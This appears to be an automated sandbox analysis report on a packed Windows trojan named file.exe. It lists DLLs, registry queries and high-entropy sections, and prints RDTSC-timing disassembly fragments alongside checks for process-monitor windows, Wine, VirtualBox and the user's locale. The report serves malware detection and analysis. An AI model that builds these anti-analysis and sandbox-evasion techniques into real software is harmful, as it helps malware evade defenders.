              Source: C:\Users\user\Desktop\file.exeCode function: 3_2_00AEF5933_2_00AEF593
              Source: C:\Users\user\Desktop\file.exeCode function: 3_2_0090B5E73_2_0090B5E7
              Source: C:\Users\user\Desktop\file.exeCode function: 3_2_00A5AD233_2_00A5AD23
              Source: C:\Users\user\Desktop\file.exeCode function: 3_2_009166493_2_00916649
              Source: C:\Users\user\Desktop\file.exeCode function: 3_2_00A577B53_2_00A577B5
              Source: C:\Users\user\Desktop\file.exeCode function: 3_2_00A6178F3_2_00A6178F
              Source: C:\Users\user\Desktop\file.exeCode function: String function: 006A4A60 appears 316 times
              Source: file.exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
              Source: file.exeStatic PE information: Section: cgikgxeh ZLIB complexity 0.9947137291854186
              Source: classification engineClassification label: mal100.troj.evad.winEXE@1/0@0/1
              Source: C:\Users\user\Desktop\file.exeCode function: 3_2_006C3A50 CreateToolhelp32Snapshot,Process32First,Process32Next,CloseHandle,3_2_006C3A50
              Source: C:\Users\user\Desktop\file.exeCode function: 3_2_006BCAE0 CoCreateInstance,MultiByteToWideChar,lstrcpyn,3_2_006BCAE0
              Source: C:\Users\user\Desktop\file.exeFile created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\BEDT2L3A\9FAQPIZQ.htmJump to behavior
              Source: C:\Users\user\Desktop\file.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
              Source: file.exeReversingLabs: Detection: 39%
              Source: file.exeString found in binary or memory: 3Cannot find '%s'. Please, re-install this application
              Source: C:\Users\user\Desktop\file.exeSection loaded: apphelp.dllJump to behavior
              Source: C:\Users\user\Desktop\file.exeSection loaded: winmm.dllJump to behavior
              Source: C:\Users\user\Desktop\file.exeSection loaded: sspicli.dllJump to behavior
              Source: C:\Users\user\Desktop\file.exeSection loaded: wininet.dllJump to behavior
              Source: C:\Users\user\Desktop\file.exeSection loaded: rstrtmgr.dllJump to behavior
              Source: C:\Users\user\Desktop\file.exeSection loaded: ncrypt.dllJump to behavior
              Source: C:\Users\user\Desktop\file.exeSection loaded: ntasn1.dllJump to behavior
              Source: C:\Users\user\Desktop\file.exeSection loaded: iertutil.dllJump to behavior
              Source: C:\Users\user\Desktop\file.exeSection loaded: windows.storage.dllJump to behavior
              Source: C:\Users\user\Desktop\file.exeSection loaded: wldp.dllJump to behavior
              Source: C:\Users\user\Desktop\file.exeSection loaded: profapi.dllJump to behavior
              Source: C:\Users\user\Desktop\file.exeSection loaded: kernel.appcore.dllJump to behavior
              Source: C:\Users\user\Desktop\file.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
              Source: C:\Users\user\Desktop\file.exeSection loaded: winhttp.dllJump to behavior
              Source: C:\Users\user\Desktop\file.exeSection loaded: mswsock.dllJump to behavior
              Source: C:\Users\user\Desktop\file.exeSection loaded: iphlpapi.dllJump to behavior
              Source: C:\Users\user\Desktop\file.exeSection loaded: winnsi.dllJump to behavior
              Source: C:\Users\user\Desktop\file.exeSection loaded: urlmon.dllJump to behavior
              Source: C:\Users\user\Desktop\file.exeSection loaded: srvcli.dllJump to behavior
              Source: C:\Users\user\Desktop\file.exeSection loaded: netutils.dllJump to behavior
              Source: C:\Users\user\Desktop\file.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0358b920-0ac7-461f-98f4-58e32cd89148}\InProcServer32Jump to behavior
              Source: file.exeStatic file information: File size 1812992 > 1048576
              Source: file.exeStatic PE information: Raw size of cgikgxeh is bigger than: 0x100000 < 0x1a0a00

              Data Obfuscation

              barindex
              Detected unpacking (changes PE section rights)
              Source: C:\Users\user\Desktop\file.exeUnpacked PE file: 3.2.file.exe.6a0000.0.unpack :EW;.rsrc:W;.idata :W; :EW;cgikgxeh:EW;aetjlfry:EW;.taggant:EW; vs :ER;.rsrc:W;.idata :W; :EW;cgikgxeh:EW;aetjlfry:EW;.taggant:EW;
              Source: C:\Users\user\Desktop\file.exeCode function: 3_2_006C6390 GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,3_2_006C6390
              Source: initial sampleStatic PE information: section where entry point is pointing to: .taggant
              Source: file.exeStatic PE information: real checksum: 0x1bbe88 should be: 0x1be77e
              Source: file.exeStatic PE information: section name:
              Source: file.exeStatic PE information: section name: .idata
              Source: file.exeStatic PE information: section name:
              Source: file.exeStatic PE information: section name: cgikgxeh
              Source: file.exeStatic PE information: section name: aetjlfry
              Source: file.exeStatic PE information: section name: .taggant
              Source: C:\Users\user\Desktop\file.exeCode function: 3_2_00A358B4 push 0B25973Ah; mov dword ptr [esp], ebx3_2_00A358F3
              Source: C:\Users\user\Desktop\file.exeCode function: 3_2_00A358B4 push 66315DADh; mov dword ptr [esp], edx3_2_00A35972
              Source: C:\Users\user\Desktop\file.exeCode function: 3_2_00A358B4 push edx; mov dword ptr [esp], 67BBEB10h3_2_00A35976
              Source: C:\Users\user\Desktop\file.exeCode function: 3_2_00A358B4 push 6C4D863Fh; mov dword ptr [esp], ecx3_2_00A35990
              Source: C:\Users\user\Desktop\file.exeCode function: 3_2_00A358B4 push ecx; mov dword ptr [esp], 01329E7Ah3_2_00A359A9
              Source: C:\Users\user\Desktop\file.exeCode function: 3_2_00A358B4 push 33225805h; mov dword ptr [esp], eax3_2_00A359C4
              Source: C:\Users\user\Desktop\file.exeCode function: 3_2_00A358B4 push ecx; mov dword ptr [esp], ebx3_2_00A359DF
              Source: C:\Users\user\Desktop\file.exeCode function: 3_2_00A870BF push 3E15E145h; mov dword ptr [esp], ebp3_2_00A87134
              Source: C:\Users\user\Desktop\file.exeCode function: 3_2_00B35092 push 6E93AC75h; mov dword ptr [esp], ebp3_2_00B3529A
              Source: C:\Users\user\Desktop\file.exeCode function: 3_2_00A8E88B push 773AADB6h; mov dword ptr [esp], ecx3_2_00A8E899
              Source: C:\Users\user\Desktop\file.exeCode function: 3_2_00A9B0E9 push 2EA09F4Dh; mov dword ptr [esp], edi3_2_00A9B13D
              Source: C:\Users\user\Desktop\file.exeCode function: 3_2_00AD78F4 push 424E663Ch; mov dword ptr [esp], ebp3_2_00AD791C
              Source: C:\Users\user\Desktop\file.exeCode function: 3_2_00ACF0DE push 2EB3EDAEh; mov dword ptr [esp], edx3_2_00ACF12D
              Source: C:\Users\user\Desktop\file.exeCode function: 3_2_00ACF0DE push eax; mov dword ptr [esp], edx3_2_00ACF1CD
              Source: C:\Users\user\Desktop\file.exeCode function: 3_2_00D3705B push 5588764Fh; mov dword ptr [esp], edi3_2_00D37096
              Source: C:\Users\user\Desktop\file.exeCode function: 3_2_00D3705B push 06D1DE3Ah; mov dword ptr [esp], edi3_2_00D370F4
              Source: C:\Users\user\Desktop\file.exeCode function: 3_2_00D3705B push ebp; mov dword ptr [esp], ebx3_2_00D3710C
              Source: C:\Users\user\Desktop\file.exeCode function: 3_2_00A9B834 push 7E2B43E5h; mov dword ptr [esp], eax3_2_00A9B88F
              Source: C:\Users\user\Desktop\file.exeCode function: 3_2_00A9B834 push eax; mov dword ptr [esp], 56CF8ABAh3_2_00A9B8A2
              Source: C:\Users\user\Desktop\file.exeCode function: 3_2_00A9B834 push 48115A00h; mov dword ptr [esp], eax3_2_00A9B905
              Source: C:\Users\user\Desktop\file.exeCode function: 3_2_00B2F00B push 5845AFD8h; mov dword ptr [esp], edx3_2_00B2F026
              Source: C:\Users\user\Desktop\file.exeCode function: 3_2_00A1C068 push 514892B9h; mov dword ptr [esp], ebx3_2_00A1C07D
              Source: C:\Users\user\Desktop\file.exeCode function: 3_2_00A1C068 push 1E880E5Bh; mov dword ptr [esp], ebx3_2_00A1C08D
              Source: C:\Users\user\Desktop\file.exeCode function: 3_2_00A1C068 push 2D659054h; mov dword ptr [esp], ebx3_2_00A1C095
              Source: C:\Users\user\Desktop\file.exeCode function: 3_2_00B03060 push 16B5219Fh; mov dword ptr [esp], ecx3_2_00B030CB
              Source: C:\Users\user\Desktop\file.exeCode function: 3_2_00AD007B push ecx; mov dword ptr [esp], 61E8357Fh3_2_00AD024A
              Source: C:\Users\user\Desktop\file.exeCode function: 3_2_00AD007B push esi; mov dword ptr [esp], eax3_2_00AD0257
              Source: C:\Users\user\Desktop\file.exeCode function: 3_2_00AD007B push 51D253C7h; mov dword ptr [esp], edi3_2_00AD02DA
              Source: C:\Users\user\Desktop\file.exeCode function: 3_2_00B5B069 push ecx; mov dword ptr [esp], ebp3_2_00B5B093
              Source: C:\Users\user\Desktop\file.exeCode function: 3_2_006C7895 push ecx; ret 3_2_006C78A8
              Source: C:\Users\user\Desktop\file.exeCode function: 3_2_00B449B4 push esi; mov dword ptr [esp], eax3_2_00B449DD
              Source: file.exeStatic PE information: section name: cgikgxeh entropy: 7.9541098731783055

              Boot Survival

              barindex
              Tries to detect process monitoring tools (Task Manager, Process Explorer etc.)
              Source: C:\Users\user\Desktop\file.exeWindow searched: window name: FilemonClassJump to behavior
              Source: C:\Users\user\Desktop\file.exeWindow searched: window name: PROCMON_WINDOW_CLASSJump to behavior
              Source: C:\Users\user\Desktop\file.exeWindow searched: window name: RegmonClassJump to behavior
              Source: C:\Users\user\Desktop\file.exeWindow searched: window name: FilemonClassJump to behavior
              Source: C:\Users\user\Desktop\file.exeWindow searched: window name: PROCMON_WINDOW_CLASSJump to behavior
              Source: C:\Users\user\Desktop\file.exeWindow searched: window name: RegmonclassJump to behavior
              Source: C:\Users\user\Desktop\file.exeWindow searched: window name: FilemonclassJump to behavior
              Source: C:\Users\user\Desktop\file.exeWindow searched: window name: PROCMON_WINDOW_CLASSJump to behavior
              Source: C:\Users\user\Desktop\file.exeCode function: 3_2_006C6390 GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,3_2_006C6390

              Malware Analysis System Evasion

              barindex
              Found evasive API chain (may stop execution after checking locale)
              Source: C:\Users\user\Desktop\file.exeEvasive API call chain: GetUserDefaultLangID, ExitProcessgraph_3-26131
              Tries to detect sandboxes / dynamic malware analysis system (registry check)
              Source: C:\Users\user\Desktop\file.exeFile opened: HKEY_CURRENT_USER\Software\WineJump to behavior
              Source: C:\Users\user\Desktop\file.exeFile opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__Jump to behavior
              Tries to detect virtualization through RDTSC time measurements
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8F004B second address: 8F0055 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jl 00007F5444E6F4F6h 0x0000000a rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8F0055 second address: 8EF8EC instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 jo 00007F5444755FBEh 0x0000000f jmp 00007F5444755FB8h 0x00000014 nop 0x00000015 mov dword ptr [ebp+122D17D7h], edi 0x0000001b push dword ptr [ebp+122D13F5h] 0x00000021 mov dword ptr [ebp+122D2D08h], edx 0x00000027 mov dword ptr [ebp+122D17D7h], edx 0x0000002d call dword ptr [ebp+122D179Eh] 0x00000033 pushad 0x00000034 jmp 00007F5444755FB0h 0x00000039 xor eax, eax 0x0000003b stc 0x0000003c mov edx, dword ptr [esp+28h] 0x00000040 or dword ptr [ebp+122D17EAh], eax 0x00000046 mov dword ptr [ebp+122D293Dh], eax 0x0000004c mov dword ptr [ebp+122D36A5h], eax 0x00000052 mov esi, 0000003Ch 0x00000057 jc 00007F5444755FACh 0x0000005d mov dword ptr [ebp+122D36A5h], eax 0x00000063 add esi, dword ptr [esp+24h] 0x00000067 pushad 0x00000068 je 00007F5444755FACh 0x0000006e mov dword ptr [ebp+122D36A5h], ecx 0x00000074 mov dword ptr [ebp+122D17D1h], edi 0x0000007a popad 0x0000007b lodsw 0x0000007d jmp 00007F5444755FB1h 0x00000082 add eax, dword ptr [esp+24h] 0x00000086 jns 00007F5444755FA7h 0x0000008c mov ebx, dword ptr [esp+24h] 0x00000090 mov dword ptr [ebp+122D17EAh], ecx 0x00000096 cld 0x00000097 push eax 0x00000098 pushad 0x00000099 je 00007F5444755FA8h 0x0000009f pushad 0x000000a0 popad 0x000000a1 push eax 0x000000a2 push edx 0x000000a3 push ecx 0x000000a4 pop ecx 0x000000a5 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A6A84A second address: A6A866 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F5444E6F506h 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A6A9AB second address: A6A9B5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 pop eax 0x00000006 popad 0x00000007 pushad 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A6A9B5 second address: A6A9CB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F5444E6F4FFh 0x00000009 pushad 0x0000000a popad 0x0000000b popad 0x0000000c rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A6AD49 second address: A6AD53 instructions: 0x00000000 rdtsc 0x00000002 jp 00007F5444755FACh 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A6E003 second address: A6E02F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop eax 0x00000005 jnl 00007F5444E6F50Ch 0x0000000b popad 0x0000000c mov eax, dword ptr [esp+04h] 0x00000010 push eax 0x00000011 push edx 0x00000012 push eax 0x00000013 push edx 0x00000014 push ebx 0x00000015 pop ebx 0x00000016 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A6E02F second address: A6E039 instructions: 0x00000000 rdtsc 0x00000002 jp 00007F5444755FA6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A6E039 second address: A6E03F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A6E03F second address: A6E056 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 mov eax, dword ptr [eax] 0x0000000a push eax 0x0000000b push edx 0x0000000c jmp 00007F5444755FABh 0x00000011 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A6E056 second address: A6E079 instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 push edx 0x00000004 pop edx 0x00000005 pop ecx 0x00000006 pop edx 0x00000007 pop eax 0x00000008 mov dword ptr [esp+04h], eax 0x0000000c push eax 0x0000000d push edx 0x0000000e js 00007F5444E6F505h 0x00000014 jmp 00007F5444E6F4FFh 0x00000019 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A6E079 second address: A6E0F3 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push esi 0x00000004 pop esi 0x00000005 push ebx 0x00000006 pop ebx 0x00000007 popad 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pop eax 0x0000000b push 00000000h 0x0000000d push esi 0x0000000e call 00007F5444755FA8h 0x00000013 pop esi 0x00000014 mov dword ptr [esp+04h], esi 0x00000018 add dword ptr [esp+04h], 00000019h 0x00000020 inc esi 0x00000021 push esi 0x00000022 ret 0x00000023 pop esi 0x00000024 ret 0x00000025 sbb dx, 1F19h 0x0000002a jmp 00007F5444755FB6h 0x0000002f lea ebx, dword ptr [ebp+12451DEDh] 0x00000035 push 00000000h 0x00000037 push esi 0x00000038 call 00007F5444755FA8h 0x0000003d pop esi 0x0000003e mov dword ptr [esp+04h], esi 0x00000042 add dword ptr [esp+04h], 00000018h 0x0000004a inc esi 0x0000004b push esi 0x0000004c ret 0x0000004d pop esi 0x0000004e ret 0x0000004f mov dl, 32h 0x00000051 xchg eax, ebx 0x00000052 push eax 0x00000053 push edx 0x00000054 push eax 0x00000055 push edx 0x00000056 jbe 00007F5444755FA6h 0x0000005c rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A6E0F3 second address: A6E0F9 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A6E158 second address: A6E15D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop eax 0x00000005 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A6E15D second address: A6E167 instructions: 0x00000000 rdtsc 0x00000002 js 00007F5444E6F4FCh 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A6E167 second address: A6E1D4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 mov dword ptr [esp], eax 0x00000009 call 00007F5444755FABh 0x0000000e and cx, 1F06h 0x00000013 pop ecx 0x00000014 push 00000000h 0x00000016 and si, C001h 0x0000001b push DC3CECC4h 0x00000020 ja 00007F5444755FBFh 0x00000026 add dword ptr [esp], 23C313BCh 0x0000002d push 00000003h 0x0000002f mov dl, 32h 0x00000031 push 00000000h 0x00000033 jne 00007F5444755FACh 0x00000039 push 00000003h 0x0000003b mov ecx, esi 0x0000003d push A0F8014Fh 0x00000042 push eax 0x00000043 push edx 0x00000044 push eax 0x00000045 push edx 0x00000046 pushad 0x00000047 popad 0x00000048 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A6E1D4 second address: A6E1E9 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F5444E6F501h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A6E1E9 second address: A6E228 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F5444755FB5h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 xor dword ptr [esp], 60F8014Fh 0x00000010 je 00007F5444755FABh 0x00000016 adc dx, AE81h 0x0000001b lea ebx, dword ptr [ebp+12451DF6h] 0x00000021 mov cx, di 0x00000024 mov edi, 76C21F46h 0x00000029 push eax 0x0000002a pushad 0x0000002b push eax 0x0000002c push edx 0x0000002d push ecx 0x0000002e pop ecx 0x0000002f rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A6E286 second address: A6E28C instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pop esi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A6E28C second address: A6E2B3 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pushad 0x00000004 popad 0x00000005 pop edx 0x00000006 pop edx 0x00000007 pop eax 0x00000008 mov dword ptr [esp], eax 0x0000000b adc cx, DD03h 0x00000010 push 00000000h 0x00000012 push 3FCE3D76h 0x00000017 push edi 0x00000018 push eax 0x00000019 push edx 0x0000001a jmp 00007F5444755FADh 0x0000001f rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A6E2B3 second address: A6E321 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edi 0x00000007 xor dword ptr [esp], 3FCE3DF6h 0x0000000e jng 00007F5444E6F4F8h 0x00000014 mov cl, 0Bh 0x00000016 push 00000003h 0x00000018 push ebx 0x00000019 pop esi 0x0000001a push 00000000h 0x0000001c mov di, bx 0x0000001f push 00000003h 0x00000021 mov cl, dl 0x00000023 push 9CB36E00h 0x00000028 push edi 0x00000029 jng 00007F5444E6F4FCh 0x0000002f jbe 00007F5444E6F4F6h 0x00000035 pop edi 0x00000036 xor dword ptr [esp], 5CB36E00h 0x0000003d or dword ptr [ebp+122D17D1h], esi 0x00000043 lea ebx, dword ptr [ebp+12451E01h] 0x00000049 pushad 0x0000004a jmp 00007F5444E6F4FFh 0x0000004f pushad 0x00000050 mov edi, dword ptr [ebp+122D2BD9h] 0x00000056 mov dword ptr [ebp+122D373Fh], edx 0x0000005c popad 0x0000005d popad 0x0000005e push eax 0x0000005f push edx 0x00000060 push eax 0x00000061 push edx 0x00000062 pushad 0x00000063 popad 0x00000064 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A7FDE0 second address: A7FDE4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A8E0DC second address: A8E0E0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A8E63E second address: A8E658 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F5444755FB5h 0x00000009 popad 0x0000000a rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A8E8D9 second address: A8E8DD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A8E8DD second address: A8E8E5 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 push ecx 0x00000007 pop ecx 0x00000008 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A8E8E5 second address: A8E8FD instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F5444E6F4FDh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b pushad 0x0000000c push eax 0x0000000d push edx 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A8E8FD second address: A8E901 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A8EA7F second address: A8EA83 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A8EA83 second address: A8EA8F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 push ecx 0x00000009 pop ecx 0x0000000a pushad 0x0000000b popad 0x0000000c rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A8EBD1 second address: A8EBD5 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A8EFD7 second address: A8EFE2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jg 00007F5444755FA6h 0x0000000a pop ebx 0x0000000b rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A8EFE2 second address: A8EFEC instructions: 0x00000000 rdtsc 0x00000002 jc 00007F5444E6F4FEh 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A522BD second address: A522C1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A522C1 second address: A522C5 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A522C5 second address: A522D8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jmp 00007F5444755FADh 0x0000000b rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A8F12E second address: A8F15F instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 jmp 00007F5444E6F506h 0x00000009 pop edx 0x0000000a pop eax 0x0000000b jmp 00007F5444E6F505h 0x00000010 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A8F809 second address: A8F827 instructions: 0x00000000 rdtsc 0x00000002 jng 00007F5444755FACh 0x00000008 push eax 0x00000009 push edx 0x0000000a jmp 00007F5444755FAEh 0x0000000f rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A8FDB4 second address: A8FDBA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A8FDBA second address: A8FDDE instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pop esi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push edi 0x00000007 pushad 0x00000008 popad 0x00000009 pushad 0x0000000a popad 0x0000000b pop edi 0x0000000c pushad 0x0000000d pushad 0x0000000e popad 0x0000000f push esi 0x00000010 pop esi 0x00000011 popad 0x00000012 push eax 0x00000013 push edx 0x00000014 jmp 00007F5444755FB0h 0x00000019 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A939D4 second address: A939D8 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A9552A second address: A95530 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pop esi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A95530 second address: A95540 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F5444E6F4FCh 0x00000009 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A95CCB second address: A95CD1 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pop ebx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A96F9A second address: A96FA5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jns 00007F5444E6F4F6h 0x0000000a popad 0x0000000b rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A9B088 second address: A9B08F instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A9B08F second address: A9B09B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pushad 0x00000006 pushad 0x00000007 popad 0x00000008 pushad 0x00000009 popad 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A9B209 second address: A9B20E instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A9B20E second address: A9B234 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 pop eax 0x00000006 pop ebx 0x00000007 push esi 0x00000008 jmp 00007F5444E6F504h 0x0000000d pop esi 0x0000000e pop edx 0x0000000f pop eax 0x00000010 pushad 0x00000011 push eax 0x00000012 push edx 0x00000013 pushad 0x00000014 popad 0x00000015 pushad 0x00000016 popad 0x00000017 rdtsc
